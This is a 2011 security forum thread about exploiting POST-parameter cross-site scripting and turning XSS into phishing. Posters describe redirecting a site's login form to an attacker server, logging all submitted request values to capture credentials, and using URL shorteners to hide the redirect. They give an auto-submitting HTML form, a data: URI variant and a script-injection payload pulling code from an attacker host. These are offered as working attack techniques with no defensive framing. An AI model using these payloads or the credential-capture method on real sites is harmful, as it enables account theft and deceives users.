.

XSS post pram and Phishing attack

<<

millwalll

Post Sat Dec 17, 2011 6:48 pm

XSS post pram and Phishing attack

Hi alll,

Need some help with my XSS foo. I have seen lots example that exploit XSS using the GET pram but cant find any that would exploit a post pram.

Does anyone have a link to a tutorial or example ?

Second of all I saw somewhere that you can use XSS to steal login details

for example:
  Code:
<form name="form1" method="post" action=details.php"?>


IF I had this form on site and found place i could inject XSS I could injection this
form[0].action.vale="http://mypage.com/details.php";

From what I understand this will just redirect the user to mypage.com on the click of the submit buttom.

My question is would I need to have code on the mypage.com/details.php to store the details in a database or what the best way to exploit this ?
<<

dynamik

Recruiters
Recruiters

Posts: 1119

Joined: Sun Nov 09, 2008 11:00 am

Location: Mile High City

Post Mon Dec 19, 2011 11:12 am

Re: XSS post pram and Phishing attack

The easiest way to play around with this would be to just create a simple PHP form that has a text field and posts to itself. When submitted, write the contents of the text field to a text file, and then output the contents of the text file back to the page.

For the second one, just have a PHP page that writes everything in the $_REQUEST variable to a log file.
The day you stop learning is the day you start becoming obsolete.
<<

millwalll

Post Tue Dec 20, 2011 5:36 am

Re: XSS post pram and Phishing attack

thanks will look into them :P
<<

MaXe

User avatar

Hero Member
Hero Member

Posts: 671

Joined: Tue Aug 17, 2010 9:49 am

Post Mon Dec 26, 2011 4:37 pm

Re: XSS post pram and Phishing attack

The way you can exploit POST-based XSS in case the $_POST['var'] variable is used, so you can only submit content via POST-requests is to create a malicious HTTP page, that sends the user to the target site and even submits a malicious script on behalf of the user.

You can use document.form.submit(); or a similar javascript function along with of course, the html <form> which you build on your server.

The link will of course point to a server you control, which could be a short url link, and when the user visits your server, the POST-data will instantly be sent by the user to the target site where the target site will respond to the user.

Meaning, even though the user visits your site first which may feel "malicious" to the user, the user will land at the target site, where the site will say it's own domain name in the URL field, and it could even say https with the blue background behind the favicon, making most users quickly forget they ever came by your server. After all, if your server responds fast, it will take a second or less which most users may not even notice  :)

As it's a fun challenge, build a .html document, such as:
<html><body><form method="POST" id="malform" action="https://targetsite.tld/script.php"><input type="hidden" name="target vulnerable variable" value="XSS" /></form><script>document.getElementById('malform').submit();</script>


If you want to test it in the URL Address Field in FireFox, just type this in:

data:text/html,<html><body><form method="POST" id="malform" action="https://targetsite.tld/script.php"><input type="hidden" name="target vulnerable variable" value="XSS" /></form><script>document.getElementById('malform').submit();</script>

Of course you have to edit the following fields: "action", "name" and "value".

Most URL shortening services doesn't permit the "data uri scheme" anymore though, otherwise you could've tricked firefox users into not even visiting your site but actually execute the HTML and javascript code on their own computers which in return, sends a malicious request to the target site which responds with the XSS.

If you need to use " to break a form or whatever, then value="XSS" should of course be e.g., value='XSS' instead, such as: value='"><script src="http://haxx.tld/.j"></script>' and so forth  ;D


Enjoy and merry X-mas  ;D
I'm an InterN0T'er

Return to Tutorials

Who is online

Users browsing this forum: No registered users and 0 guests

.
Powered by phpBB® Forum Software © phpBB Group.
Designed by ST Software